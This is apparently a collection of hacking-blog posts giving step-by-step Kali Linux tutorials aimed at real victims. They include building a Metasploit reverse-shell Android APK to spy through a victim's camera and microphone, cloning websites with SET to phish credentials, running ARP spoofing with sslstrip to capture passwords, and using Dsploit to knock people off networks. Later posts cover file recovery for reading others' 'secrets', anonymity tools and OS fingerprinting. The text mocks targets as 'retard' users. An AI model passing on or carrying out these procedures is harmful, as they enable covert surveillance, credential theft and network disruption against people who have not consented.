Hacking an android phone with Metasploit

Android devices have become a potential target from the day they were introduced in the market. The are proved to be good targets as they give out a lot of information about the target. There are various ways to hack android phone like through an app, browser, etc.
What you need?
All you need is Kali Linux installed on Vmware.

How to?
  1. Open the terminal and type the command ifconfig and note down the eth0 ip.
  2. Now type the command cd Desktop so that you can get your apk file on the desktop of the virtual machine.
  3. Now type the command msfpayload android/meterpreter/reverse_tcp LHOST= ip LPORT=port R > hcak.apk. Here you have to paste the ip after LHOST and you can change hcak to any name you would prefer for the app.
  4. Now type msfconsole & hit enter and then type use exploit/multi/handler & hit enter.
  5. Now type set payload android/meterpreter/reverse_tcp and hit enter to set the payload for the handler.
  6. Now to set the listener ip and port type set lhost ip and set lport port (make sure that the ip and port should be the same as that of the msfpayload command). To check if the ip and host are properly set type show options and hit enter.
  7. Now type exploit and hit enter and wait for the victim to install the apk and open it.
  8. Now type ifconfig or sysinfo to find out details about your target.You can try different commands to take snapshots, webcam snaps, voice recording,etc.
Note:- 
You will only have the access to the phone till the session ends if the session ends then you have to wait till the victim runs the app again. 

Posted by 9 comments :

SET: Phishing like a Pro

Phishing is a technique used by hackers to get the username and password by asking the victim to enter their credentials into a webpage which looks similar to the original site. This technique need your social engineering skills with a fair set of programming skills. And you also need to know a lit  Kali Linux provides a tool kit Know as SET(Social Engineering Tool kit) which makes the complex process a lot easier and a lot more systematic.


But but but this trick is only successful on a retard user.

What you need?

 All you need is Kali Linux installed on Vmware.

How to
  1. Start the terminal and type ifconfig and note the eth0 ip which is your Ethernet ip. 
  2. Now type the command service metasploit start to start the metasploit service.
  3. Now type the command setoolkit and hit enter to start the SET tool kit. And then select type 1 and hit enter.
  4. Now select the option 2 from the list and hit enter .
  5. Now select the option 3 form the list and hit enter.
  6. Now select the option 2 which is site cloner from the list and hit enter.
  7. Now enter the eth0 ip which you noted in the beginning by using ifconfig.And then hit enter and the enter the site URL(http://www.anysite.com) and hit enter.
  8.  Now type the ip on any web browser to see the phishing site. Paste the ip in Google URL shortener to convert the ip into a good looking URL. Send this to the victim via various methods and wait. After the retard user enters the username and password. Check the file which has the name like harvester_date.txt in the folder /var/www/ . 

Note:- 
This trick will only work if the user is stupid enough to enter his/her credentials on the fake page. And another problem is that if you see the URL you can find out the difference between the original and  the fake one.  In other words it depends on User Retard Level. 

Posted by No comments :

SSL Strip

What is SSL Strip? 
SSL strip is a type of man in the middle attack in which the request is converted to HTTP from an HTTPS request and then sent to the website through the router and then the browser connects to website through the HTTP connection.
 HTTPS is more secured that HTTP(According to security professionals) but according to hackers "EVERYTHING is Shit".


What you need?
  1. Kali Linux installed on Vmware 
  2. Android phone with Fing - Network Tools (optional)
How to?
  1. Start your virtual machine.
  2. Open the terminal and then type ifconfig. It will give you the list of interfaces. Note the wireless LAN interface(wlan*).
  3. Now type the commands echo 1 > /proc/sys/net/ipv4/ip_forward and then type iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-prot 8080 to forward the traffic.
  4. Then you can type the commands route -n (for gateway ip) and nmap -sS -O gateway ip (for target ip) or you can simply open the Fing - Network Tools to find out the router and target ip.
  5. Now to start the ARP spoofing by typing the command arpsoof -i wlan0 -t 192.168.1.
    123 -r 192.168.1.1     .     Here wlan0 can be replaced by your wireless LAN interface like wlan0, wlan1, wlan2, etc and the ip after -t is you target ip and the ip after -r is the router ip.
  6. Keep the arpspoof terminal running and then open a new terminal window and then type sslstrip -l 8080. 
  7. Now wait after the target logs into any site you will get a little details on the sslstrip window. Open a new terminal window and type cat sslstrip.log this command will open the log file and try to locate an mail id and password.
Note:-
This will not work on Facebook as the traffic is encrypted thus you won't get the username and password.
  
Posted by No comments :

Recover & Retrive:Find out what your friend's secrets

Whenever we get a pendrive even if the drive is empty it still has a lot of information about what was stored on it. This can help you find out what he/she had saved on that drive or recover sensitivity information about your company which an employee had leaked. Recovery can be done for various reasons but the tricks remain the same.


What you need?
All you need is Kali Linux on Vmware.

How to? 

Level-1:- Recuva
Recuva is one of the basic file recovery software which can be used to recovery files deleted on a regular windows computer. This software is also portable, to make a portable version you only need to copy the files from the program files directory to your pendrive. It can recovery the files of a specific file format like images, videos, music, etc. It is useful to quickly recover the file which you might have accidentally deleted.
  

 We need to run a basic command which is fdisk -l which gives you the names of all devices which is used for tools to recover files of a USB stick mounted to your Linux system.





You can consider this as the first step towards file recovery in Kali Linux.






Level-2:- foremost
 foremost is a quick recovery tool available in Kali Linux. This tool can be used in audits where you need to recover the files deleted quickly. You can use various parameters according to the requirements of the audit. To find out about all the parameters you can run the command foremost -h. But if you want to recover all files and save them on a file then you can use the command foremost -t all -v -i device name -o directory.   Here -t is the parameter which decides the type of file, -i is the parameter which decides the device name or image name, -o is the parameter which decides the output directory.

 Level-3:- scalpel
scalpel is like a bazooka  in the field of recovery. This is the ultimate recovery tool which can recover all the files deleted from a derive or image of that drive. To use this tool you will need to first do some changes in the .confg file which is present in etc/scalpel. You have to delete the # present in front of the file type. The best thing you can do is delete all the # persent in front of all the file formats. After this save it and then open a terminal and then type scalpel -h to find out about the different parameters you can use. To recover the files to a specific directory type the command scalpel device name or image file path -o output directory.


Note:- When you use tools like scalpel and foremost you get and audit.txt file with the actual files. This audit.txt file is consist the log of all files which were recovered by the tools. 

Another great feature of these tools is that it save all the different file extensions under different folders which is systematic and is helpful to sort the files and locate the file which is needed.
Posted by No comments :

Ghost on the web: Science of private browsing

Whenever you go on the net there are various organizations that track your activity on the net which is then used for various purpose. This data is used for advertising and censorship. Some countries block certain content for its citizens. Now some of these organization also try to trace you back to your house. Now if you are trying to view the content blocked in your country and the government traces your IP then the next second you will find government at your doorstep.
 There are various methods to anonymously access the net.

Private windows:- 
Now a days all the browsers have a feature for private window(incognito in chrome) this can be consider as the first line of defense from cyber espionage but it is not that efficient as the IP remains the same. Such the methods can be easily bypassed. This kind of browsing can only protect you from the individuals who are have physical access to your computer. In other  words mom wont know about the site which you accessed.

Proxy sites:- 
A proxy site is a special site which allows you to access the content blocked. These sites act as proxy server which relay all your traffic through the server to give you access of the blocked content. The problem with these sites is that they are hell slow and the problem that your IP is always out and hence the chance of getting traced is always there. In other words you can see YouTube videos on your college network. There are millions of such sites like Kproxy, boomproxy, etc.
 


 VPN:-
VPN is the acronym of virtual private network. A virtual private network is a virtual network in which a computer is connected like a regular network and in this process the public IP of the computer changes. To understand this we tried various android apps like psiphon, tunnelbear, etc. To check the public IP we used Landroid. The difference observed was that the public IP and IPS of my phone change. In other words you can teleport to any country.
 
This is understood that I didn't travel to Russia to connect to their network and take this screenshot. For security purpose I had to hide my IP.
This IP did change to US, Italian and many other countries IPs'.


We tried 2 services which was available for both windows as well as android which were psiphon and tunnelbear. Tunnelbear was a free to try VPN and psiphon was a completely free VPN. The main advantage of tunnelbear was that we could select the sever manually thus which offered you a little control. But psiphpn was more practical as per far as use was concerned. There are hundreds of other VPNs which are available on the net. 

The main drawbacks are that if the government wants to trace you it is easy as these servers have your IP. But all the VPNs require a stable internet connection if the connection keeps on dropping then these software can slow down the device and sometimes drain your battery.



TOR:-
Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. It relays the traffic across various nodes. This channel is only open for 10 minutes and then it changes the nodes. This software was initially developed for the US armed forces so that they can connect to their home bases without any leaks, thus it is simple to install and use. Tor is available for android, windows, Linux and various other operating systems. 

You can host sites(onion sites) and access site of the dark web(hidden web) through this.This software does take a little more time for connecting but is highly secured. But it has a drawback that the initial and final connection isn't encrypted and it requires a special browser to work which is mostly a modified Firefox. There are ways to crack this as well but the skill set required is high enough. In other words you can be a ghost on the web.  
 








Conclusion:- 
Thus by using various techniques depending on the level of security you need on the web you can be a ghost on the web and browse the net privately.
Posted by No comments :

OS fingerprinting

What is OS fingerprinting?
OS fingerprinting can be defined as the process of pinging a device and detecting which OS it is running. This can be don't using various tools on various operating system.



Why you need to do this?
 By detecting the OS running on a system you can filter and use the exploits which have the higher probability to give you access of the system and maintain it with ease. It also helps you save time as you need to try the vulnerabilities which the system is patched.

 How to?
  •  For android:- The best tool which you can use for OS fingerprinting on an android device is Dsploit. The time required for OS detection is mostly dependent on device's RAM. To detect the OS first you need to select the device o which you what to do the OS detection. After that you need to select the inspector and then hit start. After a few minutes you will see the results.
  • For Kali liunx:- Kali Linux has 2 tools to do this task:- 
Nmap is a port scanning tool which can be used for OS fingerprinting. There are various parameters which can be used to detect different details about the system. The one which we used was "nmap -sV -n -T4 -O -F --version-light 192.168.1.* "(without quotes). The * helps you to detect all the devices and  their OS on the network. You can experiment with different parameters for help you can type "nmap -h" (without quotes) for help or you can refer the official site

Armitage is an GUI tool which is mostly used for network exploitation. This tool comes with an host scan option which can help you to scan an detect the OS. There is an quick scan(OS detection) option under host scan which can be used for OS fingerprinting. And after the scan ends the result is displayed in and graphical format which can be changed as per your wish. You can observe that it runs the nmap command in the command line. The main advantage is that you need not to type the command and the graphical format is easy to understand.










Note:-
In our tests we found that this methods were unable to detect the phone's operating systems like android, Blackberry OS,etc.
If you are unable to detect the exact system then you can use the guess command in nmap to find out the probabilities of the system running different operating systems.   
Posted by No comments :

Kick Off with Dsploit

What you need?
For this attack you will only need a rooted android phone and of course the app Dsploit.

How to??
  1. Open the app Dsploit on your phone.
  2. It will show you all that devices connected to the wireless network. If not then hit the refresh symbol on the left hand side of the screen.
  3. Now select the specific target which you would like to kick out of the network. If you want to attack the entire wireless network then select the router.
  4. Now select MITM(man-in-the-middle) from the list.
  5. Now it will open a new list. Select kill connections to kick the target which can be a single devices or all of them from the network. 
  6.  After a few seconds you will see that your devices will be unable to connect to the net through the browser.

  7. Select it once again to stop it...
Note:-
You can also select the other options like redirect, replace images, etc. We will advice you not to try on corporate networks. If caught you could be sent to jail. You can still use it to annoy your siblings or friends. 
If you are using an android phone with android 4.0+ then you can use Zanti 2 which is an updated version of Dsploit.

 
Posted by No comments :

How to select a phone to build a bad phone?

Why you need to hack from a phone???
 Phones are devices which were made to be portable. Since the 1990's hacker have been trying to use the networks for malicious purpose. As time passed the phones become more smarter and smarter as the number of features were added to them. And and and the best thing about these devices that you can enter and exit without getting into trouble..


Which operating system you need???
Phones come with various operating systems. But now most phones have android or ios this is mostly dependent on the phone which you buy for example you buy a Sony, Samsung, Motorola, etc then the OS is android and if you buy an apple product you might be having ios. There are other operating systems which are good but the development for these operating systems is not sufficient and coding your own exploits for these systems can be an headache. Let's compare ios and android as these operating systems are the major operating systems in the smartphone market. ios is a good operating system and has a significant development. But this is a little secured OS and hence it is a little hard to work in such an locked system. This as far as hacking is concerned the best operating system is android. It is obvious that we need to get the root access of the system to perform some hardcore hacking...

What hardware you need in your phone??
  1. processor:- Most android phones have snapdragon or Intel or ARM. The only difference between them is that snapdragon is a high graphics processor and ARM & Intel are good utility processor which support most of the apps. We would personally advice you to use ARM as it is stable and most apps work on it as some apps like Dsploit require an ARM processor. You can check this with apps like AnTuTu benchmark app and similar apps.
  2. NFC:- NFC(Near field communication) is an new feature which has been added in a few smartphones this feature can be use for RFID hacking and some smart credit card skimming. This feature was added for easy and fast data sharing over short distance.You can check if your phone has NFC or not from nfcworld.com.
  3. USBOTG compatibility:- This is also a new feature which allows you to connect USB devices to your phone through a connecting wire. This can be used to connect with devices like SDR, drives, antennas, wifi dongles,etc which might be used for a wide range of attacks over different types of networks. You need to check your user manual to find out if it compatible or not. You can also Google search for this answer..

Conclusion:-
We would advice you to buy a phone in your budget which has as many features as possible so that you can experiment with it. There are various apps you can download and have fun with them.....

  
   
Posted by No comments :

Network analysis with a non-rooted android phone

Introduction:-
Network analysis is the first step toward an network penetration test. Both windows and Linux have many tools to analyze an network on the bases of different standards. But these operating systems usually run on devices which are a little to large for an usual pant or shirt pocket and another problem with these tools are that most of the don't have an GUI which means you might go retard trying to explain an professional who doesn't have an IT baground. Thus a set of tools were required which can be installed on an normal android which could be deployed instantly. So I decide to find out a few tools which could be used for network analysis on an out of the box android phone.


What you need?
An android phone or tablet with 4.0 or above. You can also try it on phones with lower versions of android but we can't tell you if it will work or not. The phone used to test is an Samsung galaxy grand 2 with android 4.4.2 operating system.

Apps:-
Wifi Analyzer:- This is mostly an wireless network analysis tool. It's main advantage is that it scans the network and tells you which are the wifi channels have are having the most signal strength. It has 5 different views which are channel graph, time graph, signal meter, AP list, channel rating. The 2 best views are the signal meter and the channel graph. Our personal favorite was signal meter view which is a meter like GUI which notifies you about the wifi signal strength with a beeping sound similar to that of a mental detector. download
Landroid:- Landroid is a little geeky app as the interface requires a little knowledge about networks. It has features like ping, traceroute, publicIP, netstat, whois, etc which are mostly the features which network admins and network penetration tester requires to check the servers and the network connectivity. We would advice you not to download this app if you are not used to an less graphical user interface. It is a pure geek and pro stuff. download


Network signal info:- This is mostly an info app which can be used to find out information regarding cellular & wireless networks. This app has a nice GUI in which it displays various information like mac address, ip, ssid ,bssid, etc. The most interesting feature of this app is that this app shows you the location of the nearest cell tower under an feature called "cell
location". Some of the features of this app might be blocked as they require you to buy an pro version to use them. In all an fairly good app to find out information regarding various stuff about your cellular as well as wireless network.download
Fing-network tools:- This app is an wireless newtork scanning app which is similar to nmap. This app scans the networks and shows you the ip address assigned to different devices in the network. This is mostly a scanning app and can be used with Dsploit for an inside attack on a computer on the network.download
Posted by
Subscribe to: Posts ( Atom )